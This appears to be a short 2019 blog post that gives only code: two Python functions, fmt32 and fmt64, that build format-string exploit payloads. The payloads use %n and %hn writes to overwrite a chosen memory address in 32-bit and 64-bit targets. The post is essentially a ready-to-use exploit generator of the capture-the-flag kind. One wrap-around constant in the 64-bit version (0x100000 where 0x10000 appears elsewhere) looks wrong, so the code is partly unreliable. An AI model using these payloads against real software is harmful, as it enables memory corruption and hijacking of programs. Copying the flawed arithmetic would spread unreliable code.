github twitter facebook email
Fmt
May 11, 2019
2 minutes read
# 32bit
def fmt32(target, overwrite, offset=7):
    pay = p32(target) + "BBBB" + p32(target+2)
    pay += "%08x" * (offset - 2)
    pay += "%" + str((overwrite & 0xffff) - 8*(offset - 2) - 12) + "c"
    pay += "%n"
    if (overwrite/0x10000) - (overwrite&0xffff) < 0:
        pay += "%" + str((overwrite/0x10000 + 0x10000) - (overwrite&0xffff)) + "c"
        pay += "%n"
    else:
        pay += "%" + str((overwrite/0x10000) - (overwrite&0xffff)) + "c"
        pay += "%n"
    return pay
# 64bit

def fmt64(target, overwrite, offset=6):
    first  = overwrite & 0xffff
    second = (overwrite&0xffff0000)>>16
    third  = (overwrite&0xffff00000000)>>32

    pay = "%" + str(first) + "c"
    pay += "%{0}$hn"
    
    if second > first:
        pay += "%" + str(second - first) + "c"
        pay += "%{1}$hn"
    else:
        pay += "%" + str(0x10000 + second - first) + "c"
        pay += "%{1}$hn"

    if third > second:
        pay += "%" + str(third - second) + "c"
        pay += "%{2}$hn"
    else:
        pay += "%" + str(0x100000 + third - second) + "c"
        pay += "%{2}$hn" 

    pay += "%" + str(0x10000 - third) + "c"
    pay += "%{3}$hn"
        
    pay += "A"*(8 - len(pay) % 8)
    pay = pay.format( offset + len(pay)/8 - 1, offset + len(pay)/8 , offset + len(pay)/8 + 1, offset + len(pay)/8 + 2  )
    pay = pay[:len(pay) - len(pay)%8]

    pay += p64(target) + p64(target+2) + p64(target+4)+ p64(target+6)
    return pay

Back to posts


comments powered by Disqus